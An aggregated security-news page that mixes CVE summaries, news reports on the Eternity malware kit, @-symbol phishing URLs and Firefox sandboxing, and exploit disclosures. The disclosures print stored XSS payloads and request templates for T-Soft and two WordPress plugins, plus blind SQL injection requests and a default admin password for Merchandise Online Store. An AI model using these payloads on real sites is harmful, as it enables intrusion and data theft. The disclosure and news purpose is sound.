Nextcloud Talk is a video and audio conferencing app for Nextcloud. In versions prior to 13.0.5 and 14.0.0, a call moderator can indirectly enable user webcams by granting permissions, if they were enabled before removing the permissions. A patch is available in versions 13.0.5 and 14.0.0. There are currently no known workarounds.

**How to use GitHub**

*   Please use the 👍 reaction to show that you are affected by the same issue.
*   Please don't comment if you have no relevant information to add. It's just extra noise for everyone subscribed to this issue.
*   Subscribe to receive notifications on status change and new comments.

**Steps to reproduce**

1.  As user A create a room with group 1 where user B is a member of
2.  As user A set custom permissions for user B only change to remove the camera permission
3.  As user A start a call
4.  As user B try to join the call

**Expected behaviour**

User B can join and talk

**Actual behaviour**

User B is disconnecting and connecting all the time

**Talk app**

**Talk app version:** master

**Custom Signaling server configured:** no

**Custom TURN server configured:** no

**Custom STUN server configured:** no

**Browser**

**Microphone available:** yes - using fake stream

**Camera available:** yes - using fake stream

**Operating system:** Ubuntu

**Browser name:** Firefox

**Browser version:** 96

**Browser log**

CVE-2022-24890: Connection can not be established without camera permission · Issue #7048 · nextcloud/spreed

T-Soft E-Commerce version 4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)# Exploit Author: Alperen Ergel (alpernae IG/TW)# Web Site: https://alperenae.gitbook.io/# Software Homepage: https://www.tsoft.com.tr/# Version : v4# Tested on: Kali Linux# Category: WebApp# Google Dork: N/A# Date: 2022-05-10# CVE :N/A######## Description ########## 1-) Login administrator page and add product# # 2-) add product name to xss payload ## 3-) Back to web site then will be work payload########## Proof of Concept ########========>>> REQUEST <<<=========POST /Y/Moduller/_Urun/Ekle/Action.php HTTP/1.1Host: domain.comCookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxxx@xxx.com; customDashboardMapping=true; PHPSESSID=18d05ae557640c93fd9739e241850438; rest1SupportUser=0; nocache=1; last_products=12User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 1028Origin: https://domain.comDnt: 1Referer: https://domain.com/srv/admin/products/save-edit/index?id=12Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closetask=UPDATE&Kategori=18&UrunId=12&UrunAdi={PAYLOAD}&MarkaId=0&MarkaAd=&ModelId=0&ModelAd=&Tedarikci=0&TedarikciKodu=12&StokSayisi=100&StokBirimId=1&StokBirimAd=Adet&EnYeniUrun=0&EnCokSatilan=0&AramaKelimeleri=&HamSatis=200&AlisFiyat=100&HavaleYuzde=0&Birim=0&KDV=18&KdvGoster=false&point_catalog=false&IndirimliUrun=true&AltUrunVar=false&YeniUrun=true&AnaSayfaUrun=true&VitrinUrun=false&Gorunme=true&BayiUrun=false&SiparisNotuGoster=false&En=0&Boy=0&Derinlik=0&Agirlik=0&Desi=1&GarantiBilgisi=&TeslimatBilgisi=&UrunNot=&WsUrunKodu=T12&SeoAyar=3&SeoTitle=&SeoLink=deneme-urun-1&SeoDesc=&SeoKeyw=&Detay=%C3%9Cr%C3%BCn%20ekleme%20konusunda%20detayl%C4%B1%20bilgi%20i%C3%A7in%2C%20videomuzu%20izleyebilirsiniz%3A%C2%A0%0A%3Cdiv%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%22%3Ehttps%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%3C%2Fa%3E%3C%2Fdiv%3E&AnaKategoriId=18&point=0&subscribe=0&subscribe_frequency=&subscribe_discount_rate=0&UruneKargoUcretsiz=0&UyeUcretsizKargo=0&BayiUcretsizKargo=0&Sayisal1=0

T-Soft E-Commerce 4 Cross Site Scripting

The Skyoftech So Listing Tabs module 2.2.0 for OpenCart allows a remote attacker to inject a serialized PHP object via the setting parameter, potentially resulting in the ability to write to files on the server, cause DoS, and achieve remote code execution because of deserialization of untrusted data.

**So Listing Tabs – A powerful Responsive OpenCart 3.0.x & OpenCart 2.x module for professionally product listing**

So Listing Tabs OpenCart module arranges your products according to categories or product’s attributes: name, price, quantity, added date…And you are free to choose what categories, attributes to display. Each tabs is available with title and tab icon. You can choose whether to show the icon or not; set the width/height for the icon as well. Besides, the module support over 10 amazing effects for items appearing with ability of setting duration/delay time for the animation.

The friendly user interface of So Listing Tabs allows you totally manage all parameters of the module. You can set which categories or item’s fields to show. Besides, you are able to manage the way to display the items in the listing tabs with many useful options: title, description, created date… It can works well on any OpenCart themes.

**Note**: This module has been updated with new installation method, view more at: New Way to Install OpenCart Module

Are you interested in SO Listing Tabs module? Let’s preview the Demo now!

**MAIN FEATURES**

*   Support Opencart 2.0.x, 2.1.x, 2.2.x, 2.3.0.x & OC 3.x
*   Fully compatible with IE9+, Firefox 2+, Flock 0.7+, Netscape, Safari, Opera 9.5 and Chrome
*   Support Responsive layout
*   Support to open link in Same Window and New Window
*   Support Multi-Module in the same page
*   Allow to set number of column for each screen resolution
*   Allow to choose listing tabs as categories or item’s attributes
*   Allow to choose categories which you want to show
*   Allow to include or exclude products from child categories
*   Allow to set the number of child category levels to return
*   Allow to select ordering direction: Ascending/Descending.
*   Allow to set the number of products to display
*   Allow to choose Products Field which you want to show tabs
*   Allow to display tab All OR not
*   Allow to set the max length for category title
*   Allow to display category’s icon OR not
*   Allow to order category Name/Odering/Random
*   Allow to set width/height of category’s icon
*   Allow to display item attributes or not: title, description, created date
*   Allow to set the max length of item’s description can be showed
*   Allow to show/hide Product Image
*   Allow to set width/height of item’s image
*   Allow to select effect for item appearing
*   Allow to set how long animation will run
*   Allow to set a timer to delay the excution of the next item in the queue
*   Allow to set the content to show at the top and at the end of module

**CHANGELOG**

VERSION 2.2.3 for OC3 - Update - Released on October 04, 2019  

\[Update\] Add URL for Heading title of Module

\[Update\] Get demo data when configure the module without available data

  

Version 2.2.0: Updated on 20 July, 2017-----------
\[+\] Compatible with OpenCart 3.0.x

VERSION 2.1.0-Update - Released on Sep 16, 2016
+ Support RTL for Opencart version 2.3.0.x 

VERSION 2.1.0 - Released on Aug 16, 2016
+ Support Opencart version 2.3.0.x

VERSION 2.0.2 - Released on Jun 21, 2016 
+ Added Cache function 

VERSION 2.0.1 - Released on Apr 11, 2016
+ Fixed errors related to duplicate file and CSS style and 
+ Fixed error when using animate.css style 

VERSION 2.0.0 - Released on Mar 28, 2016
+ Support Opencart version 2.2.x

VERSION 1.0.7 - Released on Mar 8, 2016
- Updated structural display on the front-end
- Added post-text and pre-text 

VERSION 1.0.6 - Released on Dec 28, 2015
- Updated with js and module notification

VERSION 1.0.5 - Released on Dec 16, 2015
- Added more functions

VERSION 1.0.4 - Released on Dec 10, 2015
- Updated to directly upload the package in the admin panel

VERSION 1.0.3 - Released on Dec 05, 2015
- Upgraded to OpenCart 2.1 
- Added more functions

VERSION 1.0.1 -Released on Aug 22, 2015
+ Added more params: Show Title of Module, Module Class Suffix, Type Show, Row
+ Changed tab Effect Options

VERSION 1.0.0 -Released on Aug 05, 2015
- Initial release

CVE-2022-24108: Responsive OpenCart 3.0.x & OpenCart 2.x Module - So Listing Tabs

A one-stop shop for data and crypto kleptomaniacs

A one-stop shop for data and crypto kleptomaniacs

Malware that steals passwords, cookies, and payment card data from web browsers is being sold via a Telegram channel and a Tor website, security researchers have discovered.

Collectively named the ‘Eternity Project’ by its architects, the suite of malware already includes stealers, clippers, worms, miners, and ransomware, with a Distributed Denial of Service (DDoS) bot apparently under development.

A Telegram channel provides information about forthcoming software updates and videos documenting the malware’s functionality to around 500 subscribers.

Catch up on the latest malware news and attacks

“Interestingly, individuals who purchase the malware can utilize the Telegram Bot to build the binary,” according to a blog post by Cyble Research Labs.

“The TAs \[threat actors\] provide an option in the Telegram channel to customize the binary features, which provides an effective way to build binaries without any dependencies.”

**Versatile**

A Stealer module, which costs $260 for an annual subscription, also exfiltrates AutoFill data, tokens, history, and bookmarks from Chrome, Chromium, Firefox, Edge, Opera, and more than 20 other browsers.

Other data extracted from infected machine to the threat actor’s Telegram bot are various system credentials, and cryptocurrency via a wide range of crypto-wallets and browser cryptocurrency extensions.

Eternity ransomware, meanwhile, can encrypt documents, photos, and databases on disks, local shares, and USB drives on compromised machines.

The ransomware facility – the most expensive option at $490 – offers offline encryption, an encryption algorithm combining AES and RSA, and the option to set a time limit after which files cannot be decrypted.

The Eternity worm, priced at $390, propagates through infected machines via local files and local network shares; Google Drive, OneDrive, and DropBox; and Discord, Telegram, and Python Interpreter.

For $110, budding cybercrooks can harness clipper malware that supports multiple address formats for BTC, LTC, ZEC, and BCH, while a $90-a-year cryptocurrency mining module offers silent Monero mining and automatic restarts.

**Cybercrime increase**

Researchers suspect the developer behind the Eternity Project is repurposing code in the ‘DynamicStealer’ GitHub repository, and have identified possible links with the threat actor behind the Jester Stealer malware Cyble documented in February.

Cyble Research Labs said it had recently “observed a significant increase in cybercrime through Telegram channels and cybercrime forums”.

Individuals and organizations are advised to protect themselves by installing reputable security software, enabling automatic software updates if practicable, regularly backing up data and keeping backups offline or on a separate network, and refraining from opening untrusted links and email attachments without verifying their authenticity.

YOU MIGHT ALSO LIKE Researcher stops REvil ransomware in its tracks with DLL-hijacking exploit

‘Eternity malware’ offers Swiss Army knife of cybercrime tools

A little-used feature of web addresses is being used to obfuscate malicious phishing URLs.
The post Long lost @ symbol gets new life obscuring malicious URLs appeared first on Malwarebytes Labs.

Threat actors have rediscovered an old and little-used feature of web URLs, the innocuous @ symbol we usually see in email addresses, and started using it to obscure links to their malicious websites.

Researchers from Perception Point noticed it being used in a cyberattack against multiple organization recently. While the attackers are still unknown, Perception Point traced them to an IP in Japan.

The attack started with a phishing email pretending to be from Microsoft, claiming the user has messages that have been embargoed as potential spam. (Using familiar, transactional messages from well-known brands like Microsoft has become a popular tactic for scammers, as a way to defeat spam filters and keen-eyed users.)

The message reads:

    You have new 5 held messages.
    
    You can release all of your held messages and permit or block future emails the senders, or manage messages individually.

If the recipient clicks any of the links in the email, they are directed to a phishing page made to look like an Outlook login page.

If the recipient follows the often-repeated advice to hover their pointer over the links before clicking them, to see where they go, they will see this weird-looking URL, and probably be none the wiser:

https://$%^&;\*\*\*\*((@bit.ly/3vzLjtz#ZmluYW5jZUBuZ3BjYXAuY29t

This is almost certainly designed to bamboozle users, but to your computer it looks fine. As weird as this URL appears, it is actually valid and acceptable, and your browser will happily parse it for you.

Users who clicked on the link were passed through a chain of redirects before ending up at a phishing page that looks like the Outlook login screen.

The phishing site is a copy of the Outlook login page

**Reading the URL**

As weird as it looks, the URL in this phishing campaign sticks to the rules of what’s allowed in a web address. The part you see least often is the @ symbol. RFC 3986 refers to anything after https:// and before the @ symobl, highlighted below, as userinfo. This part of the URL is for passing authentication information like a username and password, but it is very rarely used, and is simply ignored as a so-called “opaque string” by many systems.

https://**$%^&;\*\*\*\*((@**bit.ly/3vzLjtz#ZmluYW5jZUBuZ3BjYXAuY29t

The last part of the URL after the # is also ignored when you click the link. This is called the fragment identifier and it represents a piece of the destination page. The browser might use it to scroll to a section of the destination page, or it might be used to pass information to the destination page, but it plays no part in determining what the destination actually is.

https://bit.ly/3vzLjtz**#ZmluYW5jZUBuZ3BjYXAuY29t**

In this case the fragment ID—ZmluYW5jZUBuZ3BjYXAuY29t—appears to be a unique ID that identifies the email address the phish was sent to. If it’s removed, the link works but when you reach the final destination it simply shows a loading icon, perhaps to hide the site’s true intentions to accidental visitors or researchers.

What we are left with when we remove the parts that of the link that are ignored by the browser is a very ordinary-looking bit.ly link. Exactly the kind of thing you might think is suspicious in an email that says it’s from Microsoft.

https://bit.ly/3vzLjtz

As you probably know, bit.ly is a URL shortening service. The bit.ly link redirects users to another URL, likely used for tracking, which itself redirects users to the phishing page.

**Does your browser support the @ symbol?**

If you are one of the 2.6 billion people using Chrome, the answer is “yes”, URLs that use the @ symbol work in Chrome and other Chromium-based browsers such as Vivaldi, Brave, and Microsoft Edge.

The latest version of Microsoft’s Internet Explorer doesn’t parse URLs with the @ delimiter though.

Firefox and Firefox-based browsers, such as Tor and Pale Moon, are also affected.

And what about Safari?

According to Thomas Reed, Malwarebytes’ Director of Mac and Mobile, “This technique appears to work in Safari and all other major Mac browsers. Firefox will show a warning when attempting to visit such a link. Unfortunately, Safari—the most popular browser on macOS—does not display a warning and opens the link without objection, as does Chrome.”

Reed also points out that email software will often look for URLs in plain text emails and convert them to clickable links, but the @ symbol seems to prevent this. According to Reed: “The URL used by the phishing campaign does not become a clickable link by itself.” The links will still work in HTML emails, so this isn’t much of a barrier, just a feather in the cap of hold outs who insist on viewing their emails in plain text!

The wide support for the confusing and little-used @ symbol could see it used more widely. In a Threat Post interview, Perception Point’s Vice President of Customer Success and Incident Response, Motti Elloul, predicted that this won’t be the last time we’ll see phishing attacks taking advantage of it.

“The technique has the potential to catch on quickly, because it’s very easy to execute,” he said. “In order to identify the technique and avoid the fallout from it slipping past security systems, security teams need to update their detection engines in order to double check the URL structure whenever @ is included.”

Long lost @ symbol gets new life obscuring malicious URLs

The goal was Win32k Lockdown – a serious step up in Windows security

The goal was Win32k Lockdown – a serious step up in Windows security

Mozilla’s Firefox has introduced improved security mechanisms to reduce the browser attack surface.

On May 12, Mozilla security engineering manager Gian-Carlo Pascutto confirmed that the changes were included in Firefox 100, released to the stable channel on May 3.

**Process isolation**

When users browse the web through Firefox, the software renders content into separate processes, isolated from the operating system (OS) and managed by a single privileged parent process.

The reasoning behind this model is that if a bug exists in a content process, the potential attack vectors are limited.

**YOU MIGHT ALSO LIKE** ‘Browser in a browser’ – Phishing technique simulates pop-ups to exploit users

The Mozilla team wanted to refine the model further – a challenging prospect since “content processes need access to some operating system APIs to properly function: for example, they still need to be able to talk to the parent process”, according to Pascutto.

The team has already introduced Fission, a sandbox for web pages and frames, as well as RLBox, a subcomponent isolator.

Now, Firefox has debuted Win32k Lockdown, which together with Fission and RLBox “will significantly improve Firefox’s security”.

**Win32k Lockdown**

Win32k Lockdown is specific to Windows machines. Mozilla says that the parent process requires access to the full Windows API by default – including threats, OS processes, and memory.

Specifically, Mozilla wanted to restrict access to win32k.sys, an API historically exploitable, via Microsoft’s , an app for disabling access to win32k.sys system calls.

However, doing so meant that web content processes couldn’t perform a range of graphical, management, or input processing tasks otherwise handled by the API.

Therefore, Mozilla Firefox undertook a serious redesign. This included a switch to WebRender for painting web page content, making Canvas 2D and WebGL 3D operate remotely, and tweaking form controls and displays so they do not need to call OS widget APIs from within the content process.

In addition, Firefox has also rehashed line break functionality. However, challenges remain when it comes to third-party DLL loading and interactions, and a fix is planned for a future Firefox release.

**Gradual expansion**

While this security update has primarily focused on Windows machines, macOS and Linux users were not forgotten.

A quiet change was introduced for Mac users In Firefox 95 that blocked access to the WindowServer, improving process startup by between 30 - 70% and bumping up security. In Linux, the link between content processes and the X11 Server was broken in Firefox 99.

“Retrofitting a significant change in the separation of responsibilities in a large application like Firefox presents a large, multi-year engineering challenge, but it is absolutely required in order to advance browser security and to continue keeping our users safe,” Pascutto commented.

“We’re pleased to have made it through and present you with the result in Firefox 100.”

Read more of the latest browser security news

Alongside the security improvements, Firefox 100 also included new video caption support, credit card autofill for UK users, color scheme fixes, and patches for bugs such as CVE-2022-29909, a permission prompt bypass in nested browsing contexts and CVE-2022-29911, an iframe sandbox bypass.

Both Chome and Firefox have now reached the triple-digits in browser versions. When websites rely on identifying the browser version to perform business logic functions, moving from double to triple could break website functionality.

Both organizations provided compatibility testing tools to allow webmasters to identify issues before the transition.

_The Daily Swig_ has reached out to Mozilla and we will update when we hear back.

**RELATED** ‘Dangerous’ EU web authentication plan threatens to undercut browser-led certification system, detractors claim

Firefox debuts improved process isolation to reduce browser attack surface

The ScrollReveal.js Effects WordPress plugin through 1.2 does not sanitise and escape its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed

    # Exploit Title: WordPress Plugin ScrollReveal.js Effects - Stored Cross Site Scripting# Date: 25-04-2022# Exploit Author: Mariam Tariq - Hunt3rsherlock_# Vendor Homepage: https://wordpress.org/plugins/scrollrevealjs-effects/# Version: 1.1.1# Tested on: Firefox# Contact me: mariamtariq404@gmail.com# Vulnerable Code: ``` <input id="src-opacity" type="text" name="sr_config[vFactor]" value="<?phpecho $options['vFactor']; ?>" placeholder="Element ratio in float" />```# POC1. Install ScrollReveal.js Effects WordPress plugin and activate.2. Go to configuration and on vFactor field inject XSS payload “><img src=xonerror=alert(‘’XSS>3. XSS will trigger.## PoC Imagehttps://imgur.com/a/uQRT2mDhttps://imgur.com/1BB80ep

CVE-2022-1512: WordPress ScrollReveal.js Effects 1.1.1 Cross Site Scripting ≈ Packet Storm

WordPress WP Event Manager plugin version 3.1.27 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin WP Event Manager  - Stored Cross SiteScripting# Date: 15-05-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/wp-event-manager/# Version: 3.1.27# Tested on: Firefox# Contact me: mariamtariq404@gmail.com#Steps To Reproduce :1 - First Install the plugins - wp-event-manager and activate it.2 - Go to event manager —> Add New3 - Inside the “”Event Title” at the top, enter XSS payload “><img src=xonerror=alert(1)> and hit publish.4 - Check the newly made event’s URL /event/{id}/ , XSS will trigger.#Poc Image :https://imgur.com/J1Q3x5u

WordPress WP Event Manager 3.1.27 Cross Site Scripting

Merchandise Online Store v1.0 is vulnerable to SQL Injection via /vloggers_merch/?p=view_product&id=.

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/?p=view\_product&id=

Vulnerability location: /vloggers\_merch/?p=view\_product&id=,id

\[+\] Payload: /vloggers\_merch/?p=view\_product&id=a87ff679a2f3e71d9181a67b7542122c%27%20and%20length(database())%20=17--+ // Leak place ---> id

Current database name: vloggers\_merch\_db,length is 17

GET /vloggers\_merch/?p\=view\_product&id\=a87ff679a2f3e71d9181a67b7542122c%27%20and%20length(database())%20\=17\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close

When length (database ()) = 16, Content-Length: 29830 

When length (database ()) = 17, Content-Length: 26131

CVE-2022-30401: bug_report/SQLi-14.md at main · k0xx11/bug_report

Merchandise Online Store v1.0 is vulnerable to SQL Injection via /vloggers_merch/admin/orders/view_order.php?view=user&id=.

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/admin/orders/view\_order.php?view=user&id=

Vulnerability location: /vloggers\_merch/admin/orders/view\_order.php?view=user&id=,id

\[+\] Payload: /vloggers\_merch/admin/orders/view\_order.php?view=user&id=2%27%20and%20length(database())%20=17--+ // Leak place ---> id

Current database name: vloggers\_merch\_db,length is 17

GET /vloggers\_merch/admin/orders/view\_order.php?view\=user&id\=2%27%20and%20length(database())%20\=17\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close

When length (database ()) = 16, Content-Length: 4252 

When length (database ()) = 17, Content-Length: 2510

Tag

#firefox